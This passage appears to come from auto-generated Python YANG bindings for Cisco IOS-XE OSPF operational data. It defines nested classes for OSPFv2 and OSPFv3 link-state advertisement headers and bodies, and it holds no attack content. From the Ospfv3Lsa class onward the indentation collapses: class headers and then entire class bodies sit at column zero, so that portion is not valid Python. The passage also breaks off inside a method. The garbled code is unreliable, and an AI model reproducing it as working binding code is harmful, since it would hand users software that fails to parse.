                        self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
                        self._leafs = OrderedDict([
                            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                            ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                            ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                            ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
                        ])
                        self.lsa_type = None
                        self.adv_router = None
                        self.decoded_completed = None
                        self.raw_data = []
                        self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
                        self.ospfv2_lsa.parent = self
                        self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
                        self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
                        self.ospfv3_lsa.parent = self
                        self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
                        # Repeated children are YLists bound to this parent node.
                        self.ospfv2_link = YList(self)
                        self.ospfv2_topology = YList(self)
                        self.ospfv2_external = YList(self)
                        self.ospfv3_link = YList(self)
                        self.ospfv3_prefix = YList(self)
                        self.ospfv3_ia_prefix = YList(self)
                        self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        """Validate attribute writes against the declared leaf names."""
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
                    class Ospfv2Lsa(Entity):
                        """
                        YANG 'ospfv2-lsa' container under 'area-scope-lsa': a decoded
                        OSPFv2 LSA, split into 'header' and 'lsa-body' child
                        containers.

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
                            self.yang_name = "ospfv2-lsa"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
                            self._leafs = OrderedDict()
                            self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
                            self.header.parent = self
                            self._children_name_map["header"] = "header"
                            self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
                            self.lsa_body.parent = self
                            self._children_name_map["lsa_body"] = "lsa-body"
                            self._segment_path = lambda: "ospfv2-lsa"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes (no leafs declared on this node)."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)
                        class Header(Entity):
                            """
                            YANG 'header' container of 'ospfv2-lsa': the common LSA
                            header fields (lsa-id, opaque-type/id, age, type,
                            adv-router, seq-num, checksum, length, flag-options).
                            """
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
                                self.yang_name = "header"
                                self.yang_parent_name = "ospfv2-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                                    ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                                    ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                                    ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                    ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                    ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                    ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                    ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                    ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                    ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
                                ])
                                self.lsa_id = None
                                self.opaque_type = None
                                self.opaque_id = None
                                self.age = None
                                self.type = None
                                self.adv_router = None
                                self.seq_num = None
                                self.checksum = None
                                self.length = None
                                # Bits-typed leaf gets an empty Bits container, not None.
                                self.flag_options = Bits()
                                self._segment_path = lambda: "header"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                """Validate attribute writes against the declared leaf names."""
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
                        class LsaBody(Entity):
                            """
                            YANG 'lsa-body' container of 'ospfv2-lsa': body leafs
                            (num-of-links, summary-mask, external-mask,
                            body-flag-options) plus a 'network' child container.
                            """
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
                                self.yang_name = "lsa-body"
                                self.yang_parent_name = "ospfv2-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
                                self._leafs = OrderedDict([
                                    ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                                    ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                                    ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                                    ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
                                ])
                                self.num_of_links = None
                                self.summary_mask = None
                                self.external_mask = None
                                self.body_flag_options = Bits()
                                self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
                                self.network.parent = self
                                self._children_name_map["network"] = "network"
                                self._segment_path = lambda: "lsa-body"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                """Validate attribute writes against the declared leaf names."""
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
                            class Network(Entity):
                                """
                                YANG 'network' container of 'lsa-body': network-LSA
                                fields (network-mask plus the attached-router
                                leaf-list of router IDs).
                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
                                    self.yang_name = "network"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                                        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                                    ])
                                    self.network_mask = None
                                    self.attached_router = []
                                    self._segment_path = lambda: "network"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Validate attribute writes against the declared leaf names."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
                    class Ospfv2Link(Entity):
                        """
                        YANG list 'ospfv2-link' under 'area-scope-lsa', keyed by
                        (link-id, link-data).  Non-key leaf: type (uint8); repeated
                        child list: 'ospfv2-topology'.

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()
                            self.yang_name = "ospfv2-link"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['link_id','link_data']
                            self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
                            self._leafs = OrderedDict([
                                ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                                ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
                                ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                            ])
                            self.link_id = None
                            self.link_data = None
                            self.type = None
                            self.ospfv2_topology = YList(self)
                            self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
                        class Ospfv2Topology(Entity):
                            """
                            YANG list 'ospfv2-topology' under 'ospfv2-link', keyed by
                            mt-id (uint32).  Non-key leaf: metric (uint16).
                            """
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
                                self.yang_name = "ospfv2-topology"
                                self.yang_parent_name = "ospfv2-link"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['mt_id']
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                    ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                ])
                                self.mt_id = None
                                self.metric = None
                                self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                """Validate attribute writes against the declared leaf names."""
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
                    class Ospfv2Topology(Entity):
                        """
                        YANG list 'ospfv2-topology' directly under 'area-scope-lsa'
                        (distinct from Ospfv2Link.Ospfv2Topology), keyed by mt-id
                        (uint32).  Non-key leaf: metric (uint16).

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()
                            self.yang_name = "ospfv2-topology"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['mt_id']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                            ])
                            self.mt_id = None
                            self.metric = None
                            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
                    class Ospfv2External(Entity):
                        """
                        YANG list 'ospfv2-external' under 'area-scope-lsa', keyed by
                        mt-id (uint32).  Non-key leafs: metric (uint32),
                        forwarding-address (IPv4/IPv6 union), external-route-tag
                        (uint32).

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()
                            self.yang_name = "ospfv2-external"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['mt_id']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                            ])
                            self.mt_id = None
                            self.metric = None
                            self.forwarding_address = None
                            self.external_route_tag = None
                            self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
                        def __init__(self):
                            """
                            Build the 'ospfv3-lsa' container: register the 'header'
                            and 'lsa-body' child classes and instantiate both
                            singleton children (no leafs on this node).
                            """
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()
                            self.yang_name = "ospfv3-lsa"
                            self.yang_parent_name = "area-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
                            self._leafs = OrderedDict()
                            self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
                            self.header.parent = self
                            self._children_name_map["header"] = "header"
                            self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
                            self.lsa_body.parent = self
                            self._children_name_map["lsa_body"] = "lsa-body"
                            self._segment_path = lambda: "ospfv3-lsa"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes (no leafs declared on this node)."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
                        class Header(Entity):
                            """
                            YANG 'header' container of 'ospfv3-lsa': lsa-id
                            (IPv4/IPv6 union) and lsa-hdr-options (bits), plus a
                            nested 'lsa-header' child container with the decoded
                            header fields.

                            Auto-generated YANG binding class; do not edit by hand.
                            """
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()
                                self.yang_name = "header"
                                self.yang_parent_name = "ospfv3-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
                                self._leafs = OrderedDict([
                                    ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                                    ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
                                ])
                                self.lsa_id = None
                                # Bits-typed leaf gets an empty Bits container, not None.
                                self.lsa_hdr_options = Bits()
                                self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
                                self.lsa_header.parent = self
                                self._children_name_map["lsa_header"] = "lsa-header"
                                self._segment_path = lambda: "header"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                """Validate attribute writes against the declared leaf names."""
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
                            class LsaHeader(Entity):
                                """
                                YANG 'lsa-header' container of 'header': the common
                                OSPFv3 LSA header (age, type, adv-router, seq-num,
                                checksum, length).
                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()
                                    self.yang_name = "lsa-header"
                                    self.yang_parent_name = "header"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                        ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                        ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                        ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                    ])
                                    self.age = None
                                    self.type = None
                                    self.adv_router = None
                                    self.seq_num = None
                                    self.checksum = None
                                    self.length = None
                                    self._segment_path = lambda: "lsa-header"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Validate attribute writes against the declared leaf names."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
# Auto-generated binding for the OSPFv3 "lsa-body" container. Holds one child
# container per possible LSA body type (network, prefix, ia-router,
# lsa-external, nssa, link-data, ia-prefix); nested class definitions follow
# below this constructor in the generated file.
class LsaBody(Entity):
# YANG module prefix and revision this class was generated from.
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Map of YANG child name -> (python attribute, generated child class).
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
# Bit-flag leafs of the LSA body itself.
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
# Instantiate each child container eagerly and wire up its parent link.
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
# Freeze: subsequent attribute writes are validated by __setattr__ below.
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
# Auto-generated binding for the OSPFv3 network-LSA body ("network"
# container): list of attached router IDs plus the network LSA option bits.
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
# attached_router is a leaf-list (multiple uint32 values), hence a list.
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
# Auto-generated binding for the OSPFv3 inter-area prefix data ("prefix"
# container): metric, prefix string, and prefix options.
class Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
# Auto-generated binding for the OSPFv3 inter-area router data ("ia-router"
# container): metric, destination router ID, and option bits.
class IaRouter(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
# Auto-generated binding for the OSPFv3 AS-external LSA body ("lsa-external"
# container): metric, external prefix data, forwarding address, route tag,
# and a nested "flags" container holding the E-bit.
class LsaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
# Eagerly-created nested flags container, linked back to this node.
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
# Nested container holding the external-LSA flag bits (single boolean e-flag).
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
